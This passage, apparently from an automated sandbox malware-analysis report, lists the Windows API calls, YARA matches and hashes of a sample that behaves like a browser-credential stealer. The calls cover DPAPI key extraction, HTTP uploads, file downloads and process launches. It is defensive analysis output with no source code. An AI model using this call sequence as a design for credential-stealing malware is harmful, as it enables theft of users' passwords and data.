                                      • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 022DCD5E
                                      • StrStrA.SHLWAPI(00000000,0064A364), ref: 022DCD85
                                      • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 022DCF09
                                      • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 022DCF20
                                        • Part of subcall function 022DCA87: memset.MSVCRT ref: 022DCABA
                                        • Part of subcall function 022DCA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 022DCAD8
                                        • Part of subcall function 022DCA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 022DCAE3
                                        • Part of subcall function 022DCA87: memcpy.MSVCRT(?,?,?), ref: 022DCB79
                                      • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 022DCFC1
                                      • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 022DCFD8
                                        • Part of subcall function 022DCA87: lstrcat.KERNEL32(?,00420B46), ref: 022DCBAA
                                        • Part of subcall function 022DCA87: lstrcat.KERNEL32(?,00420B47), ref: 022DCBBE
                                        • Part of subcall function 022DCA87: lstrcat.KERNEL32(?,00420B4E), ref: 022DCBDF
                                      • lstrlen.KERNEL32(00000000), ref: 022DD0AB
                                      • CloseHandle.KERNEL32(00000000), ref: 022DD103
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                      • String ID:
                                      • API String ID: 3555725114-3916222277
                                      • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                      • Instruction ID: 7a30f4c0399331f6f53a97a7d2ae2789a9cc34d3b0ed18b9c76773a63c979b17
                                      • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                      • Instruction Fuzzy Hash: 64E1EC76920308ABCF14EBE4DD95EEEB77AAF64300F404159F107A6194EF346A89DF60
                                      APIs
                                      • strtok_s.MSVCRT ref: 00411307
                                      • strtok_s.MSVCRT ref: 00411750
                                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00690100,?,0042110C,?,00000000), ref: 0041A82B
                                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strtok_s$lstrcpylstrlen
                                      • String ID: l
                                      • API String ID: 348468850-1524257125
                                      • Opcode ID: 432a9195c80f8163cf1e39b3f593716d90b1ba62d7a840187ccff8139da5087c
                                      • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                      • Opcode Fuzzy Hash: 432a9195c80f8163cf1e39b3f593716d90b1ba62d7a840187ccff8139da5087c
                                      • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                      APIs
                                      • memset.MSVCRT ref: 0041429E
                                      • memset.MSVCRT ref: 004142B5
                                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                      • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                      • lstrcatA.KERNEL32(?,006C09C8), ref: 0041430B
                                      • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                      • lstrcatA.KERNEL32(?,006BF5A0), ref: 00414333
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                        • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                        • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                        • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                        • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                        • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                        • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                        • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                        • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                        • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                      • StrStrA.SHLWAPI(?,006C0A58), ref: 004143F3
                                      • GlobalFree.KERNEL32(?), ref: 00414512
                                        • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                        • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                        • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                        • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                        • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                      • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                      • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                      • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                      • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                      • String ID: Xl
                                      • API String ID: 1191620704-587555811
                                      • Opcode ID: e9c503bfd55bf2daae8e75d1c13cfa2327b4c89ab9ea056daaa286f6558581c9
                                      • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                      • Opcode Fuzzy Hash: e9c503bfd55bf2daae8e75d1c13cfa2327b4c89ab9ea056daaa286f6558581c9
                                      • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                      APIs
                                      • memset.MSVCRT ref: 022E4505
                                      • memset.MSVCRT ref: 022E451C
                                        • Part of subcall function 022E9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022E9072
                                      • lstrcat.KERNEL32(?,00000000), ref: 022E4553
                                      • lstrcat.KERNEL32(?,0064A30C), ref: 022E4572
                                      • lstrcat.KERNEL32(?,?), ref: 022E4586
                                      • lstrcat.KERNEL32(?,0064A5D8), ref: 022E459A
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                        • Part of subcall function 022E8FF7: GetFileAttributesA.KERNEL32(00000000,?,022D1DBB,?,?,0042565C,?,?,00420E1F), ref: 022E9006
                                        • Part of subcall function 022D9F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 022D9FA0
                                        • Part of subcall function 022D9F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 022D9FF9
                                        • Part of subcall function 022D9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022D9C53
                                        • Part of subcall function 022D9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022D9C78
                                        • Part of subcall function 022D9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022D9C98
                                        • Part of subcall function 022D9C27: ReadFile.KERNEL32(000000FF,?,00000000,022D16F6,00000000), ref: 022D9CC1
                                        • Part of subcall function 022D9C27: LocalFree.KERNEL32(022D16F6), ref: 022D9CF7
                                        • Part of subcall function 022D9C27: CloseHandle.KERNEL32(000000FF), ref: 022D9D01
                                        • Part of subcall function 022E9627: GlobalAlloc.KERNEL32(00000000,022E4644,022E4644), ref: 022E963A
                                      • StrStrA.SHLWAPI(?,Xl), ref: 022E465A
                                      • GlobalFree.KERNEL32(?), ref: 022E4779
                                        • Part of subcall function 022D9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022D5155,00000000,00000000), ref: 022D9D56
                                        • Part of subcall function 022D9D27: LocalAlloc.KERNEL32(00000040,?,?,?,022D5155,00000000,?), ref: 022D9D68
                                        • Part of subcall function 022D9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022D5155,00000000,00000000), ref: 022D9D91
                                        • Part of subcall function 022D9D27: LocalFree.KERNEL32(?,?,?,?,022D5155,00000000,?), ref: 022D9DA6
                                        • Part of subcall function 022DA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022DA094
                                      • lstrcat.KERNEL32(?,00000000), ref: 022E470A
                                      • StrCmpCA.SHLWAPI(?,004208D1), ref: 022E4727
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 022E4739
                                      • lstrcat.KERNEL32(00000000,?), ref: 022E474C
                                      • lstrcat.KERNEL32(00000000,00420FB8), ref: 022E475B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                      • String ID: Xl
                                      • API String ID: 1191620704-587555811
                                      • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                      • Instruction ID: 9f76b99db6c1d1b8667cebf9b2c3c177e82e0d579a2785da4de87d1280749433
                                      • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                      • Instruction Fuzzy Hash: 047151B6910218BBDF14FBE0DC89FEE737AAB49300F408598E60696184EB75D748CF91
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • RegOpenKeyExA.ADVAPI32(00000000,0068B920,00000000,00020019,00000000,004205B6), ref: 004183A4
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                      • wsprintfA.USER32 ref: 00418459
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                                      • String ID: - $%s\%s$?
                                      • API String ID: 3246050789-3278919252
                                      • Opcode ID: 42a5d8bc1a5f6b6aae150ce843a0b440668e7b255a0e5373a5ffc13d61f19133
                                      • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                                      • Opcode Fuzzy Hash: 42a5d8bc1a5f6b6aae150ce843a0b440668e7b255a0e5373a5ffc13d61f19133
                                      • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • memset.MSVCRT ref: 00410C1C
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                      • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                      • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                      • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                      • lstrlenA.KERNEL32(?), ref: 00410CA7
                                      • memset.MSVCRT ref: 00410CCD
                                      • memset.MSVCRT ref: 00410CE1
                                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00690100,?,0042110C,?,00000000), ref: 0041A82B
                                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00689760,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                      • String ID: .exe
                                      • API String ID: 1395395982-4119554291
                                      • Opcode ID: 5e4bf211cd2d807b48d0bab5dfaabd8c7764bed20d7350be932a7f57dadaee1e
                                      • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                      • Opcode Fuzzy Hash: 5e4bf211cd2d807b48d0bab5dfaabd8c7764bed20d7350be932a7f57dadaee1e
                                      • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                      APIs
                                        • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                        • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A51
                                        • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A68
                                        • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A7F
                                        • Part of subcall function 022D4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022D4AA0
                                        • Part of subcall function 022D4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022D4AB0
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 022D4B7C
                                      • StrCmpCA.SHLWAPI(?,l), ref: 022D4BA1
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022D4D21
                                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 022D504F
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 022D506B
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 022D507F
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 022D50B0
                                      • InternetCloseHandle.WININET(00000000), ref: 022D5114
                                      • InternetCloseHandle.WININET(00000000), ref: 022D512C
                                      • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022D4D7C
                                        • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                        • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                        • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                        • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                        • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                        • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                      • InternetCloseHandle.WININET(00000000), ref: 022D5136
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                      • String ID: l
                                      • API String ID: 2402878923-362530722
                                      • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                      • Instruction ID: 21a76691624c61f5b7b1424e415f815fb5e120f1ce242c80f8999c252b95355d
                                      • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                      • Instruction Fuzzy Hash: 7B12A972920318AACF15EBD4DD91EEEB37ABF65300F904199A10762194EF742F88DF61
                                      APIs
                                        • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                        • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A51
                                        • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A68
                                        • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A7F
                                        • Part of subcall function 022D4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022D4AA0
                                        • Part of subcall function 022D4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022D4AB0
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                      • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 022D6548
                                      • StrCmpCA.SHLWAPI(?,l), ref: 022D656A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022D659C
                                      • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022D65EC
                                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 022D6626
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 022D6638
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 022D6664
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 022D66D4
                                      • InternetCloseHandle.WININET(00000000), ref: 022D6756
                                      • InternetCloseHandle.WININET(00000000), ref: 022D6760
                                      • InternetCloseHandle.WININET(00000000), ref: 022D676A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                      • String ID: l
                                      • API String ID: 3074848878-362530722
                                      • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                      • Instruction ID: 010a79656eda3fd90a2a50c07f3ab8d02aca67028114a3aad40fe2fd1ca24a78
                                      • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                      • Instruction Fuzzy Hash: 2A717E75A60318ABEF24DFE4DC48BEE7779FB44700F508199E10A6B294DBB46A84CF41
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateGlobalStream
                                      • String ID: image/jpeg
                                      • API String ID: 2244384528-3785015651
                                      • Opcode ID: d3f300acffffec73a1ed4a36f821494afe58ad8f25ce0001d5394ca583b39d44
                                      • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                                      • Opcode Fuzzy Hash: d3f300acffffec73a1ed4a36f821494afe58ad8f25ce0001d5394ca583b39d44
                                      • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                        • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                        • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                      • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                      • StrCmpCA.SHLWAPI(?,006C0DE0), ref: 00406147
                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                      • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                      • InternetCloseHandle.WININET(a+A), ref: 00406253
                                      • InternetCloseHandle.WININET(00000000), ref: 00406260
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                      • String ID: a+A$a+A$l
                                      • API String ID: 4287319946-2789129631
                                      • Opcode ID: 653881ee7fdcfb00626dfd15be3c7c07a9e0627dd95ec019f9b1fd5cab93ad4d
                                      • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                      • Opcode Fuzzy Hash: 653881ee7fdcfb00626dfd15be3c7c07a9e0627dd95ec019f9b1fd5cab93ad4d
                                      • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
